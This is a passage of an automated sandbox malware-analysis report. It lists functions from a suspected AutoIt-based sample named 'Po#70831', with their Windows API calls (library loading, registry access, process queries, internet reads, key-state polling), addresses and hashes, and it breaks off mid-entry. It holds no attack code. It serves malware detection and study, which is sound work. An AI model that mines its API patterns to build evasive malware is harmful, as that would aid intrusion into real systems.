                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E62
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00494E74
                                      • FreeLibrary.KERNEL32(00000000,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-1355242751
                                      • Opcode ID: 588de79cb54ac3b37b8e03dcee46642d7fbb23c21e058598fe6e2eb847beeff5
                                      • Instruction ID: 48bc08dcaee45409800bcb009feb9e4553214f1758937cb1da42cf04581c5baa
                                      • Opcode Fuzzy Hash: 588de79cb54ac3b37b8e03dcee46642d7fbb23c21e058598fe6e2eb847beeff5
                                      • Instruction Fuzzy Hash: C0D0C232902A31578E321B24BC19D8F2E18BFC7B613050122BC04A6312DF24CD17D5D4
                                      Function 0051A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 0051A427
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0051A435
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0051A468
                                      • CloseHandle.KERNEL32(?), ref: 0051A63D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      • Opcode ID: 30f21b76d93747b3fdb37bb8521e72a75be280db0f2baace46178c43d56c6a34
                                      • Instruction ID: 2af0ea78649b21779a9ed87a01f411a976962fa94a0f9d854ef45409b4e1add5
                                      • Opcode Fuzzy Hash: 30f21b76d93747b3fdb37bb8521e72a75be280db0f2baace46178c43d56c6a34
                                      • Instruction Fuzzy Hash: 42A1B2716043009FEB20DF25C886F2ABBE1BF44718F14881DF55A9B2D2D7B4EC418B96
                                      Function 004CBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00533700), ref: 004CBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0056121C,000000FF,00000000,0000003F,00000000,?,?), ref: 004CBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00561270,000000FF,?,0000003F,00000000,?), ref: 004CBC36
                                      • _free.LIBCMT ref: 004CBB7F
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CBD4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      • Opcode ID: 34709d333639323bac513ade43758f924e08aed96acc7ae4d088158ba97acf16
                                      • Instruction ID: c5d44acc257ef490a0d202149c3c53ce787594390764d23d2404268cd7a09eb1
                                      • Opcode Fuzzy Hash: 34709d333639323bac513ade43758f924e08aed96acc7ae4d088158ba97acf16
                                      • Instruction Fuzzy Hash: E95107799002089FCB50DF6A8C42E7EBBB8EF51314F14426FE510D72A1EB745D459BD8
                                      Function 004FE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004FCF22,?), ref: 004FDDFD
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004FCF22,?), ref: 004FDE16
                                        • Part of subcall function 004FE199: GetFileAttributesW.KERNEL32(?,004FCF95), ref: 004FE19A
                                      • lstrcmpiW.KERNEL32(?,?), ref: 004FE473
                                      • MoveFileW.KERNEL32(?,?), ref: 004FE4AC
                                      • _wcslen.LIBCMT ref: 004FE5EB
                                      • _wcslen.LIBCMT ref: 004FE603
                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004FE650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                      • String ID:
                                      • API String ID: 3183298772-0
                                      • Opcode ID: 253339c868983cbe18181634df4e1d880b6bbffdff7971131d1d1b64a9e1cef5
                                      • Instruction ID: 527d07030779a84d094ecadab75366bdf86d7ab3967f2dd68c9003b414fbed89
                                      • Opcode Fuzzy Hash: 253339c868983cbe18181634df4e1d880b6bbffdff7971131d1d1b64a9e1cef5
                                      • Instruction Fuzzy Hash: CA5193B24083485BC724EB95CC819EFB7DCAF84345F00092FF689D3151EF38A588876A
                                      Function 0051B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 0051C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0051B6AE,?,?), ref: 0051C9B5
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051C9F1
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA68
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051BAA5
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0051BB00
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0051BB63
                                      • RegCloseKey.ADVAPI32(?,?), ref: 0051BBA6
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051BBB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 826366716-0
                                      • Opcode ID: bfdef745c727a5ea173014d3f19f7d328b7e49840124befb877af908001a2806
                                      • Instruction ID: 13c792106e91fb5a8e33b04bf93e88db0f3512bd160f54260398b04a2c24d449
                                      • Opcode Fuzzy Hash: bfdef745c727a5ea173014d3f19f7d328b7e49840124befb877af908001a2806
                                      • Instruction Fuzzy Hash: B7619271208241AFE714DF14C494E6ABFE5FF84348F14896DF4994B2A2DB31ED85CB92
                                      Function 004F8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 004F8BCD
                                      • VariantClear.OLEAUT32 ref: 004F8C3E
                                      • VariantClear.OLEAUT32 ref: 004F8C9D
                                      • VariantClear.OLEAUT32(?), ref: 004F8D10
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004F8D3B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      • Opcode ID: 915fda5902962deb1ec7e3a5735d2f6e7c131fa9f546b26f74a5044c3d2cc20f
                                      • Instruction ID: aa7c74b9f331b65aae8b464050c64ee46cb87f64dd04e233d7622f741e56b0f8
                                      • Opcode Fuzzy Hash: 915fda5902962deb1ec7e3a5735d2f6e7c131fa9f546b26f74a5044c3d2cc20f
                                      • Instruction Fuzzy Hash: 625169B5A00619EFCB10CF68D884AAABBF8FF89310B15855AE905DB354E734E911CF94
                                      Function 00508AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00508BAE
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00508BDA
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00508C32
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00508C57
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00508C5F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: 9c87d3bf752c466bcb4766e3344f33c83173b8a2445e0460fdd92dcb77864cc4
                                      • Instruction ID: c7a78b6b169ce2e85b95525060a2c88beb93cda3d8fa36864fbbfcb13f0066d4
                                      • Opcode Fuzzy Hash: 9c87d3bf752c466bcb4766e3344f33c83173b8a2445e0460fdd92dcb77864cc4
                                      • Instruction Fuzzy Hash: 6C513835A00214AFDB11DF65C880E6DBBF1BF49318F088069E849AB3A2DB35ED41CB94
                                      Function 00518EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00518F40
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00518FD0
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00518FEC
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00519032
                                      • FreeLibrary.KERNEL32(00000000), ref: 00519052
                                        • Part of subcall function 004AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00501043,?,7644E610), ref: 004AF6E6
                                        • Part of subcall function 004AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004EFA64,00000000,00000000,?,?,00501043,?,7644E610,?,004EFA64), ref: 004AF70D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                      • String ID:
                                      • API String ID: 666041331-0
                                      • Opcode ID: d4916d7e60a29cd9a73e71db127eb86491fd8233f32dcec29683418834d0bf25
                                      • Instruction ID: 1112fc031d885833daf9836ef3973ae1ce2c41a66159e08f1e7ef3c48f22b389
                                      • Opcode Fuzzy Hash: d4916d7e60a29cd9a73e71db127eb86491fd8233f32dcec29683418834d0bf25
                                      • Instruction Fuzzy Hash: 17513935604205DFDB15DF59C4948EDBFB1FF49328B0580A9E8069B362DB35ED86CB90
                                      Function 00526B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00526C33
                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00526C4A
                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00526C73
                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0050AB79,00000000,00000000), ref: 00526C98
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00526CC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Long$MessageSendShow
                                      • String ID:
                                      • API String ID: 3688381893-0
                                      • Opcode ID: 3b1ca8abc744802f9ce5c8404f41ca8d16ccd3821dec1cb1db1f12b7d750da29
                                      • Instruction ID: ccfab96565f95ad8eee43ba9f7dedbbb38a7ee3c893d4371bc657113d1de2f76
                                      • Opcode Fuzzy Hash: 3b1ca8abc744802f9ce5c8404f41ca8d16ccd3821dec1cb1db1f12b7d750da29
                                      • Instruction Fuzzy Hash: 2641A035604124AFDB24EF28DC58BA97FA5FF0B360F150268F895AB2E1C371AD41DA50
                                      Function 004C2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: be0e5249c0a1cd2615a3ce188dbf9d9eaf6d34bc44813b23e5046f2ada5b5434
                                      • Instruction ID: f4c5284311a9769076065cbafbbfa36287523ddb4dc4be3811d6ea4dc47769f5
                                      • Opcode Fuzzy Hash: be0e5249c0a1cd2615a3ce188dbf9d9eaf6d34bc44813b23e5046f2ada5b5434
                                      • Instruction Fuzzy Hash: AB410276A002009FCB20DF79CA81F5EB7E1EF89314F15416EE605EB392DAB5AD01CB84
                                      Function 004A912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004A9141
                                      • ScreenToClient.USER32(00000000,?), ref: 004A915E
                                      • GetAsyncKeyState.USER32(00000001), ref: 004A9183
                                      • GetAsyncKeyState.USER32(00000002), ref: 004A919D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 9255cfe87d287bfb632df6c56b27dc642a7f9e8765316507fca4dbcc121e3bd5
                                      • Instruction ID: ce995e9eeb8374f3c810717d75bbb4dd6fc1923366470528f0c117e50d83d2af
                                      • Opcode Fuzzy Hash: 9255cfe87d287bfb632df6c56b27dc642a7f9e8765316507fca4dbcc121e3bd5
                                      • Instruction Fuzzy Hash: C8419D31A0821ABBDF159F65C848BEEBB74FF16320F20821AE425A73D0C7386D50DB95
                                      Function 00503874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetInputState.USER32 ref: 005038CB
                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00503922
                                      • TranslateMessage.USER32(?), ref: 0050394B
                                      • DispatchMessageW.USER32(?), ref: 00503955
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00503966
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                      • String ID:
                                      • API String ID: 2256411358-0
                                      • Opcode ID: 0881473b833d25b91a300cb128811e63cb44cff2f8a565e0dcbf29c594a3efdd
                                      • Instruction ID: d0986d4020a82014ddf72e045e658c51b826980c797a0699249288444cca1792
                                      • Opcode Fuzzy Hash: 0881473b833d25b91a300cb128811e63cb44cff2f8a565e0dcbf29c594a3efdd
                                      • Instruction Fuzzy Hash: 433193709056419EEB35CF349949BBE3FACBB25304F084D6DE462831E1E3E49689DB51
                                      Function 0050CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0050CF38
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 0050CF6F
                                      • GetLastError.KERNEL32(?,00000000,?,?,?,0050C21E,00000000), ref: 0050CFB4
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0050C21E,00000000), ref: 0050CFC8
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0050C21E,00000000), ref: 0050CFF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 3191363074-0
                                      • Opcode ID: e3a6c55b3116f3a2fa7e1a778f947023c085c496dd435522f9018cadc521b1cb
